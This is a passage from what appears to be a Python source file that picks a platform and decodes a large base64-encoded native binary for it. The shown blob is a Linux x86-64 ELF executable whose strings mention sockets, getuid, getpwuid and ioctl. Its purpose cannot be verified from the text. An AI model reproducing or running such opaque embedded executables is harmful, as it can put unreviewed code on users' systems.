AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==')
return R
if a.__isLinux64():
R = at(
'f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAA0B1AAAAAAABAAAAAAAAAAIiFAAAAAAAAAAAAAEAAOAAIAEAAHwAcAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAAwAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAAAAAcAAAAAAAAABwAAAAAAAAAAQAAAAAAAAABAAAABQAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAANp+AAAAAAAA2n4AAAAAAAAAACAAAAAAAAEAAAAGAAAAAIAAAAAAAAAAgGAAAAAAAACAYAAAAAAATAQAAAAAAACIBQAAAAAAAAAAIAAAAAAAAgAAAAYAAAAwgAAAAAAAADCAYAAAAAAAMIBgAAAAAADAAQAAAAAAAMABAAAAAAAACAAAAAAAAAAEAAAABAAAABwCAAAAAAAAHAJAAAAAAAAcAkAAAAAAAEQAAAAAAAAARAAAAAAAAAAEAAAAAAAAAFDldGQEAAAAyG4AAAAAAADIbkAAAAAAAMhuQAAAAAAAvAEAAAAAAAC8AQAAAAAAAAQAAAAAAAAAUeV0ZAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAvbGliNjQvbGQtbGludXgteDg2LTY0LnNvLjIABAAAABAAAAABAAAAR05VAAAAAAACAAAABgAAABIAAAAEAAAAFAAAAAMAAABHTlUACHLYGcZ03nLqZ3wJJah7dklEA6gDAAAASAAAAAEAAAAGAAAAAAISACEBEAEAAAAASAAAAEoAAABQkgj5If30CShF1UwUmAxDeUlrtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgEAAASAAAAAAAAAAAAAAAAAAAAAAAAALADAAASAAAAAAAAAAAAAAAAAAAAAAAAAEIAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJcGAAASAAAAAAAAAAAAAAAAAAAAAAAAAMgFAAASAAAAAAAAAAAAAAAAAAAAAAAAAA4HAAASAAAAAAAAAAAAAAAAAAAAAAAAAKIDAAASAAAAAAAAAAAAAAAAAAAAAAAAABUHAAASAAAAAAAAAAAAAAAAAAAAAAAAAMQEAAASAAAAAAAAAAAAAAAAAAAAAAAAAB4HAAASAAAAAAAAAAAAAAAAAAAAAAAAACICAAASAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAgAAAAAAAAAAAAAAAAAAAAAAAAALEBAAASAAAAAAAAAAAAAAAAAAAAAAAAAMUDAAASAAAAAAAAAAAAAAAAAAAAAAAAALoFAAASAAAAAAAAAAAAAAAAAAAAAAAAAMUCAAASAAAAAAAAAAAAAAAAAAAAAAAAABoGAAASAAAAAAAAAAAAAAAAAAAAAAAAAEIHAAASAAAAAAAAAAAAAAAAAAAAAAAAAGEGAAASAAAAAAAAAAAAAAAAAAAAAAAAAMsAAAASAAAAAAAAAAAAAAAAAAAAAAAAAA0GAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEHAAASAAAAAAAAAAAAAAAAAAAAAAAAACUEAAASAAAAAAAAAAAAAAAAAAAAAAAAAN4FAAASAAAAAAAAAAAAAAAAAAAAAAAAAPIGAAASAAAAAAAAAAAAAAAAAAAAAAAAADQEAAASAAAAAAAAAAAAAAAAAAAAAAAAAG4CAAASAAAAAAAAAAAAAAAAAAAAAAAAAJMFAAASAAAAAAAAAAAAAAAAAAAAAAAAACsHAAASAAAAAAAAAAAAAAAAAAAAAAAAAOoGAAASAAAAAAAAAAAAAAAAAAAAAAAAAFQBAAASAAAAAAAAAAAAAAAAAAAAAAAAADYHAAASAAAAAAAAAAAAAAAAAAAAAAAAAJ0FAAASAAAAAAAAAAAAAAAAAAA
AAAAAADIGAAASAAAAAAAAAAAAAAAAAAAAAAAAALAFAAASAAAAAAAAAAAAAAAAAAAAAAAAADEHAAASAAAAAAAAAAAAAAAAAAAAAAAAAPMBAAASAAAAAAAAAAAAAAAAAAAAAAAAANMCAAASAAAAAAAAAAAAAAAAAAAAAAAAAKEGAAASAAAAAAAAAAAAAAAAAAAAAAAAAMABAAASAAAAAAAAAAAAAAAAAAAAAAAAANwGAAASAAAAAAAAAAAAAAAAAAAAAAAAAGwEAAASAAAAAAAAAAAAAAAAAAAAAAAAADsHAAASAAAAAAAAAAAAAAAAAAAAAAAAAL4AAAASAAAAAAAAAAAAAAAAAAAAAAAAAOMGAAASAAAAAAAAAAAAAAAAAAAAAAAAAAYEAAASAAAAAAAAAAAAAAAAAAAAAAAAACQHAAASAAAAAAAAAAAAAAAAAAAAAAAAAEwFAAASAAAAAAAAAAAAAAAAAAAAAAAAADMAAAAgAAAAAAAAAAAAAAAAAAAAAAAAALQCAAASAAAAAAAAAAAAAAAAAAAAAAAAABcFAAASAAAAAAAAAAAAAAAAAAAAAAAAABIBAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEBAAASAAAAAAAAAAAAAAAAAAAAAAAAANUEAAASAAAAAAAAAAAAAAAAAAAAAAAAABUEAAASAAAAAAAAAAAAAAAAAAAAAAAAALoDAAASAAAAAAAAAAAAAAAAAAAAAAAAADYDAAASAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJADAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAASAAAAAAAAAAAAAAAAAAAAAAAAAHYBAAASAAAAAAAAAAAAAAAAAAAAAAAAAMMGAAASAAAAAAAAAAAAAAAAAAAAAAAAACwCAAASAAAAAAAAAAAAAAAAAAAAAAAAABsDAAASAAAAAAAAAAAAAAAAAAAAAAAAAO4FAAASAAAAAAAAAAAAAAAAAAAAAAAAAHUAAAASAAAAAAAAAAAAAAAAAAAAAAAAAFMFAAASAAAAAAAAAAAAAAAAAAAAAAAAAEgDAAASAAAAAAAAAAAAAAAAAAAAAAAAAH8CAAASAAAAAAAAAAAAAAAAAAAAAAAAAPsGAAASAAAAAAAAAAAAAAAAAAAAAAAAADkCAAAiAA0ARWtAAAAAAABuAAAAAAAAAMsDAAASAAAA0BxAAAAAAAAAAAAAAAAAAOkAAAASAAAA0BpAAAAAAAAAAAAAAAAAANQFAAARABoAYIRgAAAAAAAQAQAAAAAAAGEBAAASAAAAIB1AAAAAAAAAAAAAAAAAAABsaWJzdGRjKysuc28uNgBfX2dtb25fc3RhcnRfXwBfSnZfUmVnaXN0ZXJDbGFzc2VzAHB0aHJlYWRfY2FuY2VsAF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTVjbG9zZUV2AF9aTktTczRmaW5kRVBLY20AX1pOU3QxOGJhc2ljX3N0cmluZ3N0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFU2FJY0VFRDFFdgBfWk5TYUljRUQxRXYAX1pOU2k1c2Vla2dFbFN0MTJfSW9zX1NlZWtkaXIAX1pOU3Q4aW9zX2Jhc2U0SW5pdEQxRXYAX1pOU29sc0VQRlJTb1NfRQBfWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVDMUVQS2NTdDEzX0lvc19PcGVubW9kZQBfWk5Tc3BMRVJLU3MAX19neHhfcGVyc29uYWxpdHlfdjAAX1pOS1N0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRTNzdHJFdgBfWk5LU3M1Y19zdHJFdgBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0l
jRUU1Y2xvc2VFdgBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVEMUV2AF9aTlNzcExFYwBfWk5Tc2FTRVJLU3MAX1pTdHBsSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVTYklUX1QwX1QxX0VSS1M2X1M4XwBfWk5TbzV3cml0ZUVQS2NsAF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTdpc19vcGVuRXYAX1pOU3M2YXBwZW5kRVBLYwBfWk5LU3M0c2l6ZUV2AF9aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlAF9aTlNvbHNFUEZSU3Q4aW9zX2Jhc2VTMF9FAF9fY3hhX2JlZ2luX2NhdGNoAF9aU3Rsc0ljU3QxMWNoYXJfdHJhaXRzSWNFRVJTdDEzYmFzaWNfb3N0cmVhbUlUX1QwX0VTNl9TdDhfU2V0ZmlsbElTM19FAF9aTlNzOXB1c2hfYmFja0VjAF9aTlNzNWNsZWFyRXYAX1pOU3NDMUV2AF9aTlNpcnNFUm0AX1puYW0AX1pTdDRlbmRsSWNTdDExY2hhcl90cmFpdHNJY0VFUlN0MTNiYXNpY19vc3RyZWFtSVRfVDBfRVM2XwBfWk5TczVlcmFzZUVtbQBfX2N4YV9lbmRfY2F0Y2gAX1pOU2k0cmVhZEVQY2wAX1pTdGxzSVN0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JY1RfRVM1X1BLYwBfWlN0bHNJY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRVJTdDEzYmFzaWNfb3N0cmVhbUlUX1QwX0VTN19SS1NiSVM0X1M1X1QxX0UAX1pOU3NhU0VQS2MAX1pOS1NzNnN1YnN0ckVtbQBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVDMUVQS2NTdDEzX0lvc19PcGVubW9kZQBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU3aXNfb3BlbkV2AF9aZGFQdgBfWlN0bHNJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfU3Q1X1NldHcAX1pOU3NEMUV2AF9aTlNzQzFFUEtjUktTYUljRQBfWk5Tc2l4RW0AX1pOU2k1dGVsbGdFdgBfWk5Tc3BMRVBLYwBfWlN0NGNvdXQAX1pOS1NzNmxlbmd0aEV2AF9aTlNzNmFwcGVuZEVSS1NzAF9aTlNhSWNFQzFFdgBfWk5Tc0MxRVJLU3MAX1pOU3Q4aW9zX2Jhc2U0SW5pdEMxRXYAX1pOU3QxNGJhc2ljX2lmc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFRDFFdgBfWlN0bHNJU3QxMWNoYXJfdHJhaXRzSWNFRVJTdDEzYmFzaWNfb3N0cmVhbUljVF9FUzVfaABfWk5Tb2xzRWkAX1pOU29sc0VqAGxpYm0uc28uNgBsaWJnY2Nfcy5zby4xAF9VbndpbmRfUmVzdW1lAGxpYmMuc28uNgBzb2NrZXQAc3RyY3B5AHNwcmludGYAZ2V0cHd1aWQAbWtkaXIAX19jeGFfYXRleGl0AG1lbXNldABzaHV0ZG93bgBpb2N0bABnZXR1aWQAYmNvcHkAYXRvaQBhdG9sAHN0cmNtcABfX2xpYmNfc3RhcnRfbWFpbgBHQ0NfMy4wAEdMSUJDXzIuMi41AENYWEFCSV8xLjMAR0xJQkNYWF8zLjQAAAAAAgACAAIAAgACAAMAAgADAAIAAwACAAAAAAACAAIAAgACAAIAAwACAAIAAgADAAIAAgADAAIAAgACAAMAAwACAAM
AAgACAAIAAwACAAIAAgACAAMAAgADAAIAAwACAAMAAgAAAAIAAgACAAIAAgAEAAIABAACAAIAAgACAAUAAgACAAIAAgACAAIAAgADAAEAAgACAAIABAAAAAAAAAABAAEAtQYAABAAAAAgAAAAUCZ5CwAABQBUBwAAAAAAAAEAAQDSBgAAEAAAACAAAAB1GmkJAAADAFwHAAAAAAAAAQACAAEAAAAQAAAAAAAAANOvawUAAAQAaAcAABAAAAB0KZIIAAACAHMHAAAAAAAA8IFgAAAAAAAGAAAADAAAAAAAAAAAAAAAYIRgAAAAAAAFAAAASwAAAAAAAAAAAAAAEIJgAAAAAAAHAAAAAQAAAAAAAAAAAAAAGIJgAAAAAAAHAAAAAgAAAAAAAAAAAAAAIIJgAAAAAAAHAAAAAwAAAAAAAAAAAAAAKIJgAAAAAAAHAAAABAAAAAAAAAAAAAAAMIJgAAAAAAAHAAAABQAAAAAAAAAAAAAAOIJgAAAAAAAHAAAABgAAAAAAAAAAAAAAQIJgAAAAAAAHAAAABwAAAAAAAAAAAAAASIJgAAAAAAAHAAAACAAAAAAAAAAAAAAAUIJgAAAAAAAHAAAACQAAAAAAAAAAAAAAWIJgAAAAAAAHAAAACgAAAAAAAAAAAAAAYIJgAAAAAAAHAAAACwAAAAAAAAAAAAAAaIJgAAAAAAAHAAAADgAAAAAAAAAAAAAAcIJgAAAAAAAHAAAADwAAAAAAAAAAAAAAeIJgAAAAAAAHAAAAEAAAAAAAAAAAAAAAgIJgAAAAAAAHAAAAEQAAAAAAAAAAAAAAiIJgAAAAAAAHAAAAEgAAAAAAAAAAAAAAkIJgAAAAAAAHAAAAEwAAAAAAAAAAAAAAmIJgAAAAAAAHAAAAFAAAAAAAAAAAAAAAoIJgAAAAAAAHAAAAFQAAAAAAAAAAAAAAqIJgAAAAAAAHAAAAFgAAAAAAAAAAAAAAsIJgAAAAAAAHAAAAFwAAAAAAAAAAAAAAuIJgAAAAAAAHAAAAGAAAAAAAAAAAAAAAwIJgAAAAAAAHAAAAGQAAAAAAAAAAAAAAyIJgAAAAAAAHAAAASgAAAAAAAAAAAAAA0IJgAAAAAAAHAAAAGgAAAAAAAAAAAAAA2IJgAAAAAAAHAAAAGwAAAAAAAAAAAAAA4IJgAAAAAAAHAAAAHAAAAAAAAAAAAAA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nIABoGQAAAOlQ/v///yXaZyAAaBoAAADpQP7///8l0mcgAGgbAAAA6TD+////JcpnIABoHAAAAOkg/v///yXCZyAAaB0AAADpEP7///8lumcgAGgeAAAA6QD+////JbJnIABoHwAAAOnw/f///yWqZyAAaCAAAADp4P3///8lomcgAGghAAAA6dD9////JZpnIABoIgAAAOnA/f///yWSZyAAaCMAAADpsP3///8limcgAGgkAAAA6aD9////JYJnIABoJQAAAOmQ/f///yV6ZyAAaCYAAADpgP3///8lcmcgAGgnAAAA6XD9////JWpnIABoKAAAAOlg/f///yViZyAAaCkAAADpUP3///8lWmcgAGgqAAAA6UD9////JVJnIABoKwAAAOkw/f///yVKZyAAaCwAAADpIP3///8lQmcgAGgtAAAA6RD9////JTpnIABoLgAAAOkA/f///yUyZyAAaC8AAADp8Pz///8lKmcgAGgwAAAA6eD8////JSJnIABoMQAAAOnQ/P///yUaZyAAaDIAAADpwPz///8lEmcgAGgzAAAA6bD8////JQpnIABoNAAAAOmg/P///yUCZyAAaDUAAADpkPz///8l+mYgAGg2AAAA6YD8////JfJmIABoNwAAAOlw/P///yXqZiAAaDgAAADpYPz///8l4mYgAGg5AAAA6VD8////JdpmIABoOgAAAOlA/P///yXSZiAAaDsAAADpMPz///8lymYgAGg8AAAA6SD8////JcJmIABoPQAAAOkQ/P///yW6ZiAAaD4AAAD
pAPz///8lsmYgAGg/AAAA6fD7////JapmIABoQAAAAOng+////yWiZiAAaEEAAADp0Pv///8lmmYgAGhCAAAA6cD7////JZJmIABoQwAAAOmw+////yWKZiAAaEQAAADpoPv///8lgmYgAGhFAAAA6ZD7////JXpmIABoRgAAAOmA+///Me1JidFeSIniSIPk8FBUScfAwGtAAEjHwdBrQABIx8ejY0AA6Gf8///0kJBIg+wISIsF6WMgAEiFwHQC/9BIg8QIw5CQkJCQkJCQkJCQkJBVSInlU0iD7AiAPUBnIAAAdUu7IIBgAEiLBTpnIABIgesYgGAASMH7A0iD6wFIOdhzJGYPH0QAAEiDwAFIiQUVZyAA/xTFGIBgAEiLBQdnIABIOdhy4sYF82YgAAFIg8QIW8nDZmZmLg8fhAAAAAAASIM9kGEgAABVSInldBK4AAAAAEiFwHQIvyiAYADJ/+DJw5CQVUiJ5UFWQVVBVFNIgeyQAQAASIn7SIm1WP7//4mVVP7//74IAAAAvxAAAADoBUkAAInCSI2FYP7//4nWSInH6Lj8//9Ix0XYAAAAAOtuSItF2EiLlVj+//9IjQQCD7YARA+24L8wAAAA6I5LAABBicW/AgAAAOhVSQAAQYnGSI2FYP7//0iDwBC+XGhAAEiJx+gW/v//RIn2SInH6Dv+//9Eie5IicfoQP7//0SJ5kiJx+hV/P//SINF2AGLhVT+//9IO0XYD5fAhMB1gUiJ2EiNlWD+//9IidZIicfomv3//+siidNJicRIjYVg/v//SInH6ET9//9MieBIY9NIicfohv3//0iNhWD+//9IicfoJ/3//0iJ2EiJ2EiBxJABAABbQVxBXUFeycNVSInlQVRTSIHssAEAAEiJvVj+//+JtVT+//9IiZVI/v//x0XkAAAAAEjHRegAAAAA6eQAAABIx0XYAAAAAL4IAAAAvxAAAADovkcAAInCSI2FYP7//4nWSInH6HH7//9Ii0XoSIPAAUgDhVj+//8PtgAPtthIi0XoSIuVWP7//0iNBAIPtgBED7bgSI2FYP7//0iDwBC+XGhAAEiJx+je/P//RInmSInH6OP5//+J3kiJx+jZ+f//SI1V2EiNhWD+//9IidZIicfoE/z//4tF5EgDhUj+//9Ii1XYiBCDReQBSI2FYP7//0iJx+gg/P//SINF6ALrIonTSYnESI2FYP7//0iJx+gF/P//TIngSGPTSInH6Ef8//+LhVT+//9IO0XoD5fAhMAPhQf///9IgcSwAQAAW0FcycNVSInlU0iD7DhIiX3ISItFyEiJx+jdQAAASIlF2EjHReAAAAAAx0XoAAAAAOsZi0XoSItVyEiYD7YEAkgPvsBIAUXgg0XoAYN96DsPnsCEwHXcSIN92AB1B0iDfeAAdV3HRewAAAAA60KLXeyLVeyJ0AHAjQwQuslCFrKJyPfqjQQKicLB+gSJyMH4H4nWKcaJ8GvAF4nKKcKJ0InBSItVyEhjw4gMAoNF7AGDfew7D57AhMB1s7gAAAAA6wW4AQAAAEiDxDhbycNVSInlifiIRfwPvkX8Jf8AAADJw1VIieVBVFNIgexgDQAASIm9uPL//0iJtbDy//9Ii4Ww8v//xgAASIuFuPL//w+2AITAdQq7/////+ltBgAASI2F4P7//0iJx+jW/v//SI2FcP///0iJx+gd9///SI2FYP///0iJx+gO9///xoXA9v//AMdFzAAAAABIjUWPSInH6JT6//9IjVWPSIuNuPL//0iNRYBIic5Iicfoyvj//0iNlXD///9IjUWAvgAAAABIicfo6EUAAOsZidNJicRIjUWASInH6E/4//9MieBIY9PrDkiNRYBIicfoO/j//+scidNJicRIjUWPSInH6Cj5//9MieBIY9PpUQUAAEiNRY9IicfoEfn//74IAAAAvwQAAADo3EQAAEGJxEiNhXD///9Iicfo8Pb//0iJwUiNhdD
8//9EieJIic5IicfoSPn//0iNhdD8//9Iicfoafr//4TAD4SqAAAASI2F0Pz//7oCAAAAvgAAAABIicfoGPf//0iNhdD8//9Iicfoufb//0iJwUiJ0EiJjaDy//9IiYWo8v//SIuFoPL//0iJRZBIi4Wo8v//SIlFmEiNRZBIicfoh0cAAIlFzEiNhdD8//+6AAAAAL4AAAAASInH6Lf2//+LVcxIjY3A9v//SI2F0Pz//0iJzkiJx+jL9v//SI2F0Pz//0iJx+iM9f//6egBAABIjUWvSInH6Av5//9IjVWvSIuNuPL//0iNRaBIic5IicfoQff//0iNlXD///9IjUWgvgEAAABIicfoX0QAAOsZidNJicRIjUWgSInH6Mb2//9MieBIY9PrDkiNRaBIicfosvb//+scidNJicRIjUWvSInH6J/3//9MieBIY9PpmwMAAEiNRa9IicfoiPf//74IAAAAvwQAAADoU0MAAEGJxEiNhXD///9IicfoZ/X//0iJwUiNhcD6//9EieJIic5Iicfov/f//0iNhcD6//9Iicfo4Pj//4PwAYTAdBC7/f///0G8AAAAAOnJAAAASI2FwPr//7oCAAAAvgAAAABIicfogPX//0iNhcD6//9IicfoIfX//0iJwUiJ0EiJjaDy//9IiYWo8v//SIuFoPL//0iJRbBIi4Wo8v//SIlFuEiNRbBIicfo70UAAIlFzEiNhcD6//+6AAAAAL4AAAAASInH6B/1//+LVcxIjY3A9v//SI2FwPr//0iJzkiJx+gz9f//SI2FwPr//0iJx+j08///QbwBAAAA6xyJ00mJxEiNhcD6//9IicfoyPX//0yJ4Ehj0+saSI2FwPr//0iJx+ix9f//RYXkD4RrAgAA6xdIicfoDvf//7v9////6NT2///pUgIAAIF9zIEAAAB3Crv8////6T8CAABIjYXA9v//SI2VwPL//4tNzInOSInH6ND5//9Ii4W48v//D7YAiEXRSIuFuPL//0iDwAEPtgCIRdLHRdQAAAAA61CLTdSLRdSJwA+2hAXA8v//icIyVdGJyIiUBcDy//8PtlXRD7ZF0Q+v0InQAcAB0I1QCg+2RdKJhZzy//+J0MH6H/e9nPL//4nQiEXRg0XUAYtFzNHoO0XUD5fAhMB1ocZF0wDHRdgAAAAA6dIAAADHRdwAAAAA6bMAAADHReAAAAAAx0XkAAAAAMdF6AAAAADrd4tV2InQAcAB0AHAA0XoSJgPtoQFwPL//w++wInH6Pn6//+Jw4tV3InQAcAB0AHAA0XoSJgPtoQF4P7//w++wInH6NX6//85ww+UwITAdASDReABi1XYidABwAHQAcADRehImA+2hAXA8v//hMB1BINF5AGDRegBg33oBQ+ewITAD4V6////g33gBnUMg33kBnQGxkXTAesTg0XcAYN93AkPnsCEwA+FPv///4NF2AGDfdgJD57AhMAPhR////8PtkXTg/ABhMB0Crv+////6ZgAAABIjYVg////vsBsQABIicfosfH//8dF7DwAAADrJYtF7InAD7aEBcDy//8PvtBIjYVg////idZIicfoJ/L//4NF7AGLRczR6DtF7A+XwITAdcxIjYVg////SInH6BXy//9IicJIi4Ww8v//SInWSInH6BD0//+7AAAAAOscidNJicRIjYXQ/P//SInH6EXz//9MieBIY9PrEUiNhdD8//9IicfoLvP//+scidNJicRIjYVg////SInH6Ljy//9MieBIY9PrEUiNhWD///9IicfoofL//+siidNJicRIjYVw////SInH6Ivy//9MieBIY9NIicforfT//0iNhXD///9IicfobvL//4nYSIHEYA0AAFtBXMnDVUiJ5UFUU0iB7OAAAABIib0o////ibUk////SImVGP///0iNRY9IicfoMvT//0iNVY9Ii40o////SI1FgEiJzkiJx+ho8v//6x+J00mJxEiNRY9
IicfoBfP//0yJ4Ehj00iJx+gn9P//SI1Fj0iJx+jr8v//SIuFGP///8YAAEiLhRj////GQB4ASIuFGP///8ZAQABIi4UY////xkBKAEiLhRj////GQGgASIuFGP///8dAPAAAAABIjVWASI1FkEiJ1kiJx+gU8f//i5Uk////SI1FkInWSInH6DcjAACIRc9IjUWQSInH6HHx///rHInTSYnESI1FkEiJx+he8f//TIngSGPT6fAEAAAPtkXPg/ABhMB0CrsAAAAA6Q4FAABIjUWAugAAAAC+4WxAAEiJx+iY8///SIlF0EiLRdBIjVABSI1FgL7hbEAASInH6Hvz//9IiUXYSItF2EiNUAFIjUWAvuFsQABIicfoXvP//0iJReBIi0XgSI1QAUiNRYC+4WxAAEiJx+hB8///SIlF6EiDfdD/dQhIx0XQAAAAAEiDfdj/dQhIx0XYAAAAAEiDfeD/dQhIx0XgAAAAAEiDfej/dQhIx0XoAAAAAEiDfdAAdR9Ig33YAHUYSIN94AB1EUiDfegAdQq7AAAAAOk7BAAASI2FcP///0iLVdBIjV2ASInRugAAAABIid5IicfoGe///0iNhXD///9IicfoOu///0iLlRj///9Ig8JKSInGSInX6DTx//9Ii0XQSItV2EiJ0UgpwUiJyEiNSP9Ii0XQSI1QAUiNhWD///9IjV2ASIneSInH6MHu//9IjYVg////SInH6OLu//9IicJIi4UY////SInWSInH6N3w//9Ii0XYSItV4EiJ0UgpwUiJyEiNSP9Ii0XYSI1QAUiNhVD///9IjV2ASIneSInH6Gru//9IjYVQ////SInH6Ivu//9Ii5UY////SIPCHkiJxkiJ1+iF8P//SI1FgEiJx+iZ7v//SInCSItF4EiNcAFIjYVA////SI1dgEiJ0UiJ8kiJ3kiJx+gS7v//SI2FQP///0iJx+gz7v//SIuVGP///0iDwmhIicZIidfoLfD//0iNhUD///9IicfoPu7//0iNUPFIjYUw////SI2dQP///0iJ0boPAAAASIneSInH6Lnt//9IjYUw////SInH6Nrt//9Ii5UY////SIPCQEiJxkiJ1+jU7///SI2FMP///0iJx+jl7f//SI1Q/UiNRaBIjZ0w////SInRugMAAABIid5IicfoY+3//0iNRaBIicfoh+3//0iJx+j/7v//SIuV